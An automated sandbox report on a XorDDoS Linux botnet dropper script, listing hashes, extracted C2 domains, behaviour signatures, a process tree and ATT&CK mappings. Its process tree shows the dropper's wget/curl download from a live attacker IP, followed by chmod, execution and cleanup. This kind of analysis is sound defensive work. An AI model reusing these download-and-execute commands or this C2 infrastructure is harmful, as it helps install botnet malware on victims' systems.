Analysis
-
max time kernel
149s -
max time network
147s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240729-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240729-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
23-12-2024 02:24
Static task
static1
Behavioral task
behavioral1
Sample
ec991cf6eac0354077622d016f3408b35372c4bbb44e86bc250bc1fcbafedfc4.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
ec991cf6eac0354077622d016f3408b35372c4bbb44e86bc250bc1fcbafedfc4.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
ec991cf6eac0354077622d016f3408b35372c4bbb44e86bc250bc1fcbafedfc4.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
ec991cf6eac0354077622d016f3408b35372c4bbb44e86bc250bc1fcbafedfc4.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
ec991cf6eac0354077622d016f3408b35372c4bbb44e86bc250bc1fcbafedfc4.sh
-
Size
318B
-
MD5
0368897400a135549c0a2d9d83d384cc
-
SHA1
29c933b2a8dd201b4aaea73789664dda02c2fe75
-
SHA256
ec991cf6eac0354077622d016f3408b35372c4bbb44e86bc250bc1fcbafedfc4
-
SHA512
00216c30c5ab73b63821846febd159ac0be3c5a6658921ce9753c858ff2f83d698518c67283a9b2bea9da6067698b1302b6d84bf65ada476aba60bc35eedd758
Malware Config
Extracted
xorddos
api.markerbio.com:112
api.enoan2107.com:112
http://qq.com/lib.asp
-
crc_polynomial
CDB88320
Signatures
-
XorDDoS
Botnet and downloader malware targeting Linux-based operating systems and IoT devices.
-
XorDDoS payload 3 IoCs
resource yara_rule behavioral1/files/fstream-1.dat family_xorddos behavioral1/files/fstream-4.dat family_xorddos behavioral1/files/fstream-67.dat family_xorddos -
Xorddos family
-
File and Directory Permissions Modification 1 TTPs 2 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1531 chmod 1620 chmod -
Deletes itself 64 IoCs
pid Process 1533 112 1545 bhduseyqbtjl 1546 erowob 1549 igjonr 1552 vnbnodzuizbgn 1555 jptafr 1560 ploepnyzoz 1561 gyzojpbai 1564 buvmlqpqhgzf 1569 pqxttfu 1570 rkoixmjnnprkm 1576 amtkffzpclzsbo 1579 ldoiflwrllj 1584 fwuemzrlrsbcfe 1585 sqctsr 1588 omdmfraoos 1592 rnbicggzksycfr 1595 jvcpnsbteimexa 1598 gtmhdqokpaepem 1601 dvdfktzom 1604 wakvaibwwlbnbl 1607 bsuigcl 1612 gsnzrbnw 1613 ngvppzllkp 1618 lafoubw 1619 dhdjzrksuxpum 1629 xiyqdlt 1633 scmrpadeao 1636 hcdibemij 1639 kakcxhttupl 1644 bendhsevblaew 1645 ikluhxwr 1648 tbtnxkyvo 1651 irmcxidjk 1654 hnuraoyylsy 1657 vttsgupuz 1660 llejvjuhtb 1663 ouvcstnmtujo 1666 dulsok 1669 cyynthjbbmx 1674 xweriy 1675 gstanjpif 1682 wchpeuatd 1683 ssmsszmakpdw 1684 uccyvm 1687 dgppzjqlla 1690 qyomaxchsea 1693 kwbouwcrcii 1698 htkufmwvl 1699 inkmueqx 1702 ctgsod 1705 hfdrykkkhpxdn 1708 svvdhsjzp 1713 civwyyrh 1714 uygglqn 1719 navcrzmmvlnm 1720 ntpxlmvq 1726 kgxagjmbbkodf 1725 uivapgr 1729 ugejbrwqmqy 1732 rppkuzst 1735 yeqbgapjhhgnm 1740 pboqbs 1741 odlgrdhyuwng -
Executes dropped EXE 64 IoCs
ioc pid Process /tmp/112 1532 112 /bin/inozangnrzdju 1537 inozangnrzdju /bin/bhduseyqbtjl 1542 bhduseyqbtjl /bin/erowob 1544 erowob /bin/igjonr 1548 igjonr /bin/vnbnodzuizbgn 1551 vnbnodzuizbgn /bin/jptafr 1554 jptafr /bin/ploepnyzoz 1559 ploepnyzoz /bin/gyzojpbai 1557 gyzojpbai /bin/buvmlqpqhgzf 1563 buvmlqpqhgzf /bin/pqxttfu 1566 pqxttfu /bin/rkoixmjnnprkm 1568 rkoixmjnnprkm /bin/amtkffzpclzsbo 1575 amtkffzpclzsbo /bin/ldoiflwrllj 1578 ldoiflwrllj /bin/fwuemzrlrsbcfe 1583 fwuemzrlrsbcfe /bin/sqctsr 1581 sqctsr /bin/omdmfraoos 1587 omdmfraoos /bin/rnbicggzksycfr 1591 rnbicggzksycfr /bin/jvcpnsbteimexa 1594 jvcpnsbteimexa /bin/gtmhdqokpaepem 1597 gtmhdqokpaepem /bin/dvdfktzom 1600 dvdfktzom /bin/wakvaibwwlbnbl 1603 wakvaibwwlbnbl /bin/bsuigcl 1606 bsuigcl /bin/gsnzrbnw 1609 gsnzrbnw /bin/ngvppzllkp 1611 ngvppzllkp /bin/lafoubw 1615 lafoubw /bin/dhdjzrksuxpum 1617 dhdjzrksuxpum /tmp/112s 1621 112s /bin/xiyqdlt 1628 xiyqdlt /bin/scmrpadeao 1632 scmrpadeao /bin/hcdibemij 1635 hcdibemij /bin/kakcxhttupl 1638 kakcxhttupl /bin/bendhsevblaew 1641 bendhsevblaew /bin/ikluhxwr 1643 ikluhxwr /bin/tbtnxkyvo 1647 tbtnxkyvo /bin/irmcxidjk 1650 irmcxidjk /bin/hnuraoyylsy 1653 hnuraoyylsy /bin/vttsgupuz 1656 vttsgupuz /bin/llejvjuhtb 1659 llejvjuhtb /bin/ouvcstnmtujo 1662 ouvcstnmtujo /bin/dulsok 1665 dulsok /bin/cyynthjbbmx 1668 cyynthjbbmx /bin/xweriy 1673 xweriy /bin/gstanjpif 1671 gstanjpif /bin/wchpeuatd 1679 wchpeuatd /bin/ssmsszmakpdw 1677 ssmsszmakpdw /bin/uccyvm 1681 uccyvm /bin/dgppzjqlla 1686 dgppzjqlla /bin/qyomaxchsea 1689 qyomaxchsea /bin/kwbouwcrcii 1692 kwbouwcrcii /bin/htkufmwvl 1695 htkufmwvl /bin/inkmueqx 1697 inkmueqx /bin/ctgsod 1701 ctgsod /bin/hfdrykkkhpxdn 1704 hfdrykkkhpxdn /bin/svvdhsjzp 1707 svvdhsjzp /bin/civwyyrh 1710 civwyyrh /bin/uygglqn 1712 uygglqn /bin/navcrzmmvlnm 1718 navcrzmmvlnm /bin/ntpxlmvq 1716 ntpxlmvq /bin/kgxagjmbbkodf 1724 kgxagjmbbkodf /bin/uivapgr 1722 uivapgr /bin/ugejbrwqmqy 1728 ugejbrwqmqy /bin/rppkuzst 1731 rppkuzst /bin/yeqbgapjhhgnm 1734 yeqbgapjhhgnm -
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 114.114.114.114 -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /etc/cron.hourly/ujdzrngnazoni.sh inozangnrzdju -
Enumerates active TCP sockets 1 TTPs 1 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/tcp inozangnrzdju -
Enumerates running processes
Discovers information about currently running processes on the system
-
description ioc Process File opened for modification /etc/init.d/ujdzrngnazoni inozangnrzdju -
Writes file to system bin folder 64 IoCs
description ioc Process File opened for modification /bin/wakvaibwwlbnbl inozangnrzdju File opened for modification /bin/jsjohxmiduxy inozangnrzdju File opened for modification /bin/hhcmwpngw inozangnrzdju File opened for modification /bin/udzvfuqsm inozangnrzdju File opened for modification /bin/jzfjmxzxufrk inozangnrzdju File opened for modification /bin/wzxdozsuglvg inozangnrzdju File opened for modification /bin/jvcpnsbteimexa inozangnrzdju File opened for modification /bin/ejlkyqfzkkres inozangnrzdju File opened for modification /bin/uhnnymycpxj inozangnrzdju File opened for modification /bin/kfgkcfrvbcgjnd inozangnrzdju File opened for modification /bin/yhdyqjalcej inozangnrzdju File opened for modification /bin/pvirsgvx inozangnrzdju File opened for modification /bin/dyiskpcqcof inozangnrzdju File opened for modification /bin/klxtfidompkdcs inozangnrzdju File opened for modification /bin/amxyvsy inozangnrzdju File opened for modification /bin/gtmhdqokpaepem inozangnrzdju File opened for modification /bin/gsnzrbnw inozangnrzdju File opened for modification /bin/ctgsod inozangnrzdju File opened for modification /bin/webimksopjls inozangnrzdju File opened for modification /bin/jxqayhu inozangnrzdju File opened for modification /bin/plvesqseu inozangnrzdju File opened for modification /bin/xxnluj inozangnrzdju File opened for modification /bin/buvmlqpqhgzf inozangnrzdju File opened for modification /bin/kakcxhttupl inozangnrzdju File opened for modification /bin/vblvbdxo inozangnrzdju File opened for modification /bin/fgbdllgp inozangnrzdju File opened for modification /bin/tqitpzjd inozangnrzdju File opened for modification /bin/zgmkjfqyztrfo inozangnrzdju File opened for modification /bin/dhdjzrksuxpum inozangnrzdju File opened for modification /bin/dulsok inozangnrzdju File opened for modification /bin/kwbouwcrcii inozangnrzdju File opened for modification /bin/maboakkxym inozangnrzdju File opened for modification /bin/scmrpadeao inozangnrzdju File opened for modification /bin/hfdrykkkhpxdn inozangnrzdju File opened for modification /bin/oczrpmaeigp inozangnrzdju File opened for modification /bin/wrimqbiwodf inozangnrzdju File opened for modification /bin/yeqbgapjhhgnm inozangnrzdju File opened for modification /bin/ddnqaqu inozangnrzdju File opened for modification /bin/whegrbhfczi inozangnrzdju File opened for modification /bin/ujwmoudwgvzqso inozangnrzdju File opened for modification /bin/erowob inozangnrzdju File opened for modification /bin/fwuemzrlrsbcfe inozangnrzdju File opened for modification /bin/xiyqdlt 112s File opened for modification /bin/kgxagjmbbkodf inozangnrzdju File opened for modification /bin/mohlyt inozangnrzdju File opened for modification /bin/qidnbxbfxs inozangnrzdju File opened for modification /bin/bsuigcl inozangnrzdju File opened for modification /bin/gstanjpif inozangnrzdju File opened for modification /bin/xweriy inozangnrzdju File opened for modification /bin/nwphuvlqft inozangnrzdju File opened for modification /bin/lafoubw inozangnrzdju File opened for modification /bin/tbtnxkyvo inozangnrzdju File opened for modification /bin/oernuzmsen inozangnrzdju File opened for modification /bin/rkoixmjnnprkm inozangnrzdju File opened for modification /bin/dvdfktzom inozangnrzdju File opened for modification /bin/onlvbctt inozangnrzdju File opened for modification /bin/mwumut inozangnrzdju File opened for modification /bin/dznfjvficnxdbw inozangnrzdju File opened for modification /bin/bsxpqwgflwwfup inozangnrzdju File opened for modification /bin/inozangnrzdju 112 File opened for modification /bin/ldoiflwrllj inozangnrzdju File opened for modification /bin/uygglqn inozangnrzdju File opened for modification /bin/rvbhzg inozangnrzdju File opened for modification /bin/gyzojpbai inozangnrzdju -
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/tcp inozangnrzdju -
description ioc Process File opened for reading /proc/1607/fd inozangnrzdju File opened for reading /proc/1648/fd inozangnrzdju File opened for reading /proc/1969/fd inozangnrzdju File opened for reading /proc/1060/fd inozangnrzdju File opened for reading /proc/470/fd inozangnrzdju File opened for reading /proc/1163/fd inozangnrzdju File opened for reading /proc/1201/fd inozangnrzdju File opened for reading /proc/1660/fd inozangnrzdju File opened for reading /proc/619/fd inozangnrzdju File opened for reading /proc/1084/fd inozangnrzdju File opened for reading /proc/1159/fd inozangnrzdju File opened for reading /proc/1588/fd inozangnrzdju File opened for reading /proc/1687/fd inozangnrzdju File opened for reading /proc/1942/fd inozangnrzdju File opened for reading /proc/1858/fd inozangnrzdju File opened for reading /proc/1/fd inozangnrzdju File opened for reading /proc/243/fd inozangnrzdju File opened for reading /proc/969/fd inozangnrzdju File opened for reading /proc/974/fd inozangnrzdju File opened for reading /proc/1073/fd inozangnrzdju File opened for reading /proc/1612/fd inozangnrzdju File opened for reading /proc/1804/fd inozangnrzdju File opened for reading /proc/1957/fd inozangnrzdju File opened for reading /proc/1160/fd inozangnrzdju File opened for reading /proc/1199/fd inozangnrzdju File opened for reading /proc/1651/fd inozangnrzdju File opened for reading /proc/1825/fd inozangnrzdju File opened for reading /proc/1909/fd inozangnrzdju File opened for reading /proc/1097/fd inozangnrzdju File opened for reading /proc/1396/fd inozangnrzdju File opened for reading /proc/1698/fd inozangnrzdju File opened for reading /proc/1963/fd inozangnrzdju File opened for reading /proc/458/fd inozangnrzdju File opened for reading /proc/558/fd inozangnrzdju File opened for reading /proc/739/fd inozangnrzdju File opened for reading /proc/976/fd inozangnrzdju File opened for reading /proc/1758/fd inozangnrzdju File opened for reading /proc/1765/fd inozangnrzdju File opened for reading /proc/1815/fd inozangnrzdju File opened for reading /proc/1346/fd inozangnrzdju File opened for reading /proc/1741/fd inozangnrzdju File opened for reading /proc/570/fd inozangnrzdju File opened for reading /proc/1883/fd inozangnrzdju File opened for reading /proc/1903/fd inozangnrzdju File opened for reading /proc/1576/fd inozangnrzdju File opened for reading /proc/1753/fd inozangnrzdju File opened for reading /proc/1951/fd inozangnrzdju File opened for reading /proc/1101/fd inozangnrzdju File opened for reading /proc/1130/fd inozangnrzdju File opened for reading /proc/1183/fd inozangnrzdju File opened for reading /proc/1897/fd inozangnrzdju File opened for reading /proc/1527/fd inozangnrzdju File opened for reading /proc/1657/fd inozangnrzdju File opened for reading /proc/1837/fd inozangnrzdju File opened for reading /proc/1846/fd inozangnrzdju File opened for reading /proc/1896/fd inozangnrzdju File opened for reading /proc/1948/fd inozangnrzdju File opened for reading /proc/454/fd inozangnrzdju File opened for reading /proc/1198/fd inozangnrzdju File opened for reading /proc/1795/fd inozangnrzdju File opened for reading /proc/502/fd inozangnrzdju File opened for reading /proc/1828/fd inozangnrzdju File opened for reading /proc/1855/fd inozangnrzdju File opened for reading /proc/1030/fd inozangnrzdju -
Writes file to shm directory 3 IoCs
Malware can drop malicious files in the shm directory which will run directly from RAM.
description ioc Process File opened for modification /dev/shm/sem.lplrsb inozangnrzdju File opened for modification /dev/shm/sem.qPFYQh inozangnrzdju File opened for modification /dev/shm/sem.lplrsb xiyqdlt -
Writes file to tmp directory 4 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/112s wget File opened for modification /tmp/112s curl File opened for modification /tmp/112 wget File opened for modification /tmp/112 curl
Processes
-
/tmp/ec991cf6eac0354077622d016f3408b35372c4bbb44e86bc250bc1fcbafedfc4.sh/tmp/ec991cf6eac0354077622d016f3408b35372c4bbb44e86bc250bc1fcbafedfc4.sh1⤵PID:1525
-
/usr/bin/wgetwget http://43.249.172.195:888/1122⤵
- Writes file to tmp directory
PID:1526
-
-
/usr/bin/curlcurl -O http://43.249.172.195:888/1122⤵
- Writes file to tmp directory
PID:1530
-
-
/bin/chmodchmod +x 1122⤵
- File and Directory Permissions Modification
PID:1531
-
-
/tmp/112./1122⤵
- Deletes itself
- Executes dropped EXE
- Writes file to system bin folder
PID:1532
-
-
/usr/bin/wgetwget http://43.249.172.195:888/112s2⤵
- Writes file to tmp directory
PID:1534
-
-
/usr/bin/curlcurl -O http://43.249.172.195:888/112s2⤵
- Writes file to tmp directory
PID:1589
-
-
/bin/chmodchmod +x 112s2⤵
- File and Directory Permissions Modification
PID:1620
-
-
/tmp/112s./112s2⤵
- Executes dropped EXE
- Writes file to system bin folder
PID:1621
-
-
/bin/rmrm -rf 112.sh2⤵PID:1623
-
-
/bin/rmrm -rf 1122⤵PID:1625
-
-
/bin/rmrm -rf 112s2⤵PID:1626
-
-
/bin/inozangnrzdju/bin/inozangnrzdju1⤵
- Executes dropped EXE
- Creates/modifies Cron job
- Enumerates active TCP sockets
- Modifies init.d
- Writes file to system bin folder
- Reads system network configuration
- Reads runtime system information
- Writes file to shm directory
PID:1537
-
/bin/bhduseyqbtjl/bin/bhduseyqbtjl -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1542
-
/bin/erowob/bin/erowob -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1544
-
/bin/igjonr/bin/igjonr -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1548
-
/bin/vnbnodzuizbgn/bin/vnbnodzuizbgn -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1551
-
/bin/jptafr/bin/jptafr -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1554
-
/bin/ploepnyzoz/bin/ploepnyzoz -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1559
-
/bin/gyzojpbai/bin/gyzojpbai -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1557
-
/bin/buvmlqpqhgzf/bin/buvmlqpqhgzf -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1563
-
/bin/pqxttfu/bin/pqxttfu -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1566
-
/bin/rkoixmjnnprkm/bin/rkoixmjnnprkm -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1568
-
/bin/amtkffzpclzsbo/bin/amtkffzpclzsbo -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1575
-
/bin/ldoiflwrllj/bin/ldoiflwrllj -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1578
-
/bin/fwuemzrlrsbcfe/bin/fwuemzrlrsbcfe -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1583
-
/bin/sqctsr/bin/sqctsr -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1581
-
/bin/omdmfraoos/bin/omdmfraoos -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1587
-
/bin/rnbicggzksycfr/bin/rnbicggzksycfr -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1591
-
/bin/jvcpnsbteimexa/bin/jvcpnsbteimexa -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1594
-
/bin/gtmhdqokpaepem/bin/gtmhdqokpaepem -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1597
-
/bin/dvdfktzom/bin/dvdfktzom -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1600
-
/bin/wakvaibwwlbnbl/bin/wakvaibwwlbnbl -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1603
-
/bin/bsuigcl/bin/bsuigcl -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1606
-
/bin/gsnzrbnw/bin/gsnzrbnw -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1609
-
/bin/ngvppzllkp/bin/ngvppzllkp -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1611
-
/bin/lafoubw/bin/lafoubw -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1615
-
/bin/dhdjzrksuxpum/bin/dhdjzrksuxpum -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1617
-
/bin/xiyqdlt/bin/xiyqdlt1⤵
- Deletes itself
- Executes dropped EXE
- Writes file to shm directory
PID:1628
-
/bin/scmrpadeao/bin/scmrpadeao -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1632
-
/bin/hcdibemij/bin/hcdibemij -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1635
-
/bin/kakcxhttupl/bin/kakcxhttupl -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1638
-
/bin/bendhsevblaew/bin/bendhsevblaew -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1641
-
/bin/ikluhxwr/bin/ikluhxwr -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1643
-
/bin/tbtnxkyvo/bin/tbtnxkyvo -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1647
-
/bin/irmcxidjk/bin/irmcxidjk -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1650
-
/bin/hnuraoyylsy/bin/hnuraoyylsy -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1653
-
/bin/vttsgupuz/bin/vttsgupuz -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1656
-
/bin/llejvjuhtb/bin/llejvjuhtb -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1659
-
/bin/ouvcstnmtujo/bin/ouvcstnmtujo -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1662
-
/bin/dulsok/bin/dulsok -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1665
-
/bin/cyynthjbbmx/bin/cyynthjbbmx -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1668
-
/bin/xweriy/bin/xweriy -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1673
-
/bin/gstanjpif/bin/gstanjpif -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1671
-
/bin/wchpeuatd/bin/wchpeuatd -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1679
-
/bin/ssmsszmakpdw/bin/ssmsszmakpdw -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1677
-
/bin/uccyvm/bin/uccyvm -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1681
-
/bin/dgppzjqlla/bin/dgppzjqlla -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1686
-
/bin/qyomaxchsea/bin/qyomaxchsea -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1689
-
/bin/kwbouwcrcii/bin/kwbouwcrcii -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1692
-
/bin/htkufmwvl/bin/htkufmwvl -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1695
-
/bin/inkmueqx/bin/inkmueqx -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1697
-
/bin/ctgsod/bin/ctgsod -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1701
-
/bin/hfdrykkkhpxdn/bin/hfdrykkkhpxdn -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1704
-
/bin/svvdhsjzp/bin/svvdhsjzp -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1707
-
/bin/civwyyrh/bin/civwyyrh -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1710
-
/bin/uygglqn/bin/uygglqn -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1712
-
/bin/navcrzmmvlnm/bin/navcrzmmvlnm -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1718
-
/bin/ntpxlmvq/bin/ntpxlmvq -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1716
-
/bin/kgxagjmbbkodf/bin/kgxagjmbbkodf -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1724
-
/bin/uivapgr/bin/uivapgr -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1722
-
/bin/ugejbrwqmqy/bin/ugejbrwqmqy -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1728
-
/bin/rppkuzst/bin/rppkuzst -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1731
-
/bin/yeqbgapjhhgnm/bin/yeqbgapjhhgnm -d 15381⤵
- Deletes itself
- Executes dropped EXE
PID:1734
-
/bin/pboqbs/bin/pboqbs -d 15381⤵
- Deletes itself
PID:1739
-
/bin/odlgrdhyuwng/bin/odlgrdhyuwng -d 15381⤵
- Deletes itself
PID:1737
-
/bin/dyiskpcqcof/bin/dyiskpcqcof -d 15381⤵PID:1743
-
/bin/tszlvglsfby/bin/tszlvglsfby -d 15381⤵PID:1746
-
/bin/qbnidgrggzaq/bin/qbnidgrggzaq -d 15381⤵PID:1749
-
/bin/citspmmhozdu/bin/citspmmhozdu -d 15381⤵PID:1752
-
/bin/vblvbdxo/bin/vblvbdxo -d 15381⤵PID:1755
-
/bin/cwdidckvtngn/bin/cwdidckvtngn -d 15381⤵PID:1757
-
/bin/ddnqaqu/bin/ddnqaqu -d 15381⤵PID:1763
-
/bin/vbtdpsi/bin/vbtdpsi -d 15381⤵PID:1761
-
/bin/fgbdllgp/bin/fgbdllgp -d 15381⤵PID:1767
-
/bin/ejlkyqfzkkres/bin/ejlkyqfzkkres -d 15381⤵PID:1770
-
/bin/jxqayhu/bin/jxqayhu -d 15381⤵PID:1773
-
/bin/oczrpmaeigp/bin/oczrpmaeigp -d 15381⤵PID:1775
-
/bin/qnmxpyigcc/bin/qnmxpyigcc -d 15381⤵PID:1779
-
/bin/sdlshvyxpq/bin/sdlshvyxpq -d 15381⤵PID:1784
-
/bin/maboakkxym/bin/maboakkxym -d 15381⤵PID:1782
-
/bin/bndbxjfcur/bin/bndbxjfcur -d 15381⤵PID:1788
-
/bin/whegrbhfczi/bin/whegrbhfczi -d 15381⤵PID:1791
-
/bin/tqitpzjd/bin/tqitpzjd -d 15381⤵PID:1793
-
/bin/irblyhnzp/bin/irblyhnzp -d 15381⤵PID:1799
-
/bin/yhdyqjalcej/bin/yhdyqjalcej -d 15381⤵PID:1797
-
/bin/uhnnymycpxj/bin/uhnnymycpxj -d 15381⤵PID:1801
-
/bin/xbfzmidxu/bin/xbfzmidxu -d 15381⤵PID:1806
-
/bin/pxapeorwslffze/bin/pxapeorwslffze -d 15381⤵PID:1809
-
/bin/slshvxepm/bin/slshvxepm -d 15381⤵PID:1814
-
/bin/xijwrf/bin/xijwrf -d 15381⤵PID:1812
-
/bin/onlvbctt/bin/onlvbctt -d 15381⤵PID:1818
-
/bin/yboetmmeidjeyw/bin/yboetmmeidjeyw -d 15381⤵PID:1821
-
/bin/frwliijxvwuyan/bin/frwliijxvwuyan -d 15381⤵PID:1824
-
/bin/plvesqseu/bin/plvesqseu -d 15381⤵PID:1827
-
/bin/kfgkcfrvbcgjnd/bin/kfgkcfrvbcgjnd -d 15381⤵PID:1830
-
/bin/webimksopjls/bin/webimksopjls -d 15381⤵PID:1835
-
/bin/jzfjmxzxufrk/bin/jzfjmxzxufrk -d 15381⤵PID:1832
-
/bin/rbbwikvowhn/bin/rbbwikvowhn -d 15381⤵PID:1839
-
/bin/hicyubwzcenmw/bin/hicyubwzcenmw -d 15381⤵PID:1842
-
/bin/dhmvvgzwcjiyz/bin/dhmvvgzwcjiyz -d 15381⤵PID:1845
-
/bin/fnboxdnt/bin/fnboxdnt -d 15381⤵PID:1848
-
/bin/jsjohxmiduxy/bin/jsjohxmiduxy -d 15381⤵PID:1851
-
/bin/dznfjvficnxdbw/bin/dznfjvficnxdbw -d 15381⤵PID:1854
-
/bin/oqrakcqsaccf/bin/oqrakcqsaccf -d 15381⤵PID:1857
-
/bin/zdpefemoc/bin/zdpefemoc -d 15381⤵PID:1860
-
/bin/yeewjguuw/bin/yeewjguuw -d 15381⤵PID:1863
-
/bin/mwxompqrt/bin/mwxompqrt -d 15381⤵PID:1866
-
/bin/rvbhzg/bin/rvbhzg -d 15381⤵PID:1869
-
/bin/bsxpqwgflwwfup/bin/bsxpqwgflwwfup -d 15381⤵PID:1874
-
/bin/xwbdmrzbyvxlo/bin/xwbdmrzbyvxlo -d 15381⤵PID:1876
-
/bin/nwphuvlqft/bin/nwphuvlqft -d 15381⤵PID:1872
-
/bin/fbhzaxpxduiz/bin/fbhzaxpxduiz -d 15381⤵PID:1881
-
/bin/pvirsgvx/bin/pvirsgvx -d 15381⤵PID:1884
-
/bin/mwumut/bin/mwumut -d 15381⤵PID:1887
-
/bin/izejgdjdtg/bin/izejgdjdtg -d 15381⤵PID:1889
-
/bin/priiifqcywzvr/bin/priiifqcywzvr -d 15381⤵PID:1893
-
/bin/ulzogwwfbhl/bin/ulzogwwfbhl -d 15381⤵PID:1895
-
/bin/qrzzzpqhz/bin/qrzzzpqhz -d 15381⤵PID:1899
-
/bin/npcnnbk/bin/npcnnbk -d 15381⤵PID:1902
-
/bin/oernuzmsen/bin/oernuzmsen -d 15381⤵PID:1905
-
/bin/stqlvrkmhu/bin/stqlvrkmhu -d 15381⤵PID:1907
-
/bin/hhcmwpngw/bin/hhcmwpngw -d 15381⤵PID:1911
-
/bin/nnrhpfctsbnoty/bin/nnrhpfctsbnoty -d 15381⤵PID:1914
-
/bin/klxtfidompkdcs/bin/klxtfidompkdcs -d 15381⤵PID:1917
-
/bin/gfpapefrzaupo/bin/gfpapefrzaupo -d 15381⤵PID:1920
-
/bin/pzaayufixtumdx/bin/pzaayufixtumdx -d 15381⤵PID:1923
-
/bin/wzxdozsuglvg/bin/wzxdozsuglvg -d 15381⤵PID:1926
-
/bin/kwuaxua/bin/kwuaxua -d 15381⤵PID:1929
-
/bin/qidnbxbfxs/bin/qidnbxbfxs -d 15381⤵PID:1932
-
/bin/wrimqbiwodf/bin/wrimqbiwodf -d 15381⤵PID:1934
-
/bin/qbqqzlsudayrc/bin/qbqqzlsudayrc -d 15381⤵PID:1938
-
/bin/ujwmoudwgvzqso/bin/ujwmoudwgvzqso -d 15381⤵PID:1941
-
/bin/xikazczmwwpx/bin/xikazczmwwpx -d 15381⤵PID:1944
-
/bin/ibvfms/bin/ibvfms -d 15381⤵PID:1947
-
/bin/amxyvsy/bin/amxyvsy -d 15381⤵PID:1950
-
/bin/mohlyt/bin/mohlyt -d 15381⤵PID:1953
-
/bin/xxnluj/bin/xxnluj -d 15381⤵PID:1956
-
/bin/rfnubsgtmihjg/bin/rfnubsgtmihjg -d 15381⤵PID:1959
-
/bin/bgsouzztvls/bin/bgsouzztvls -d 15381⤵PID:1962
-
/bin/zgmkjfqyztrfo/bin/zgmkjfqyztrfo -d 15381⤵PID:1965
-
/bin/nvmwap/bin/nvmwap -d 15381⤵PID:1967
-
/bin/udzvfuqsm/bin/udzvfuqsm -d 15381⤵PID:1971
-
/bin/tsxeddwcepv/bin/tsxeddwcepv -d 15381⤵PID:1974
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Boot or Logon Initialization Scripts
1RC Scripts
1Scheduled Task/Job
1Cron
1Privilege Escalation
Boot or Logon Autostart Execution
1Boot or Logon Initialization Scripts
1RC Scripts
1Scheduled Task/Job
1Cron
1Defense Evasion
File and Directory Permissions Modification
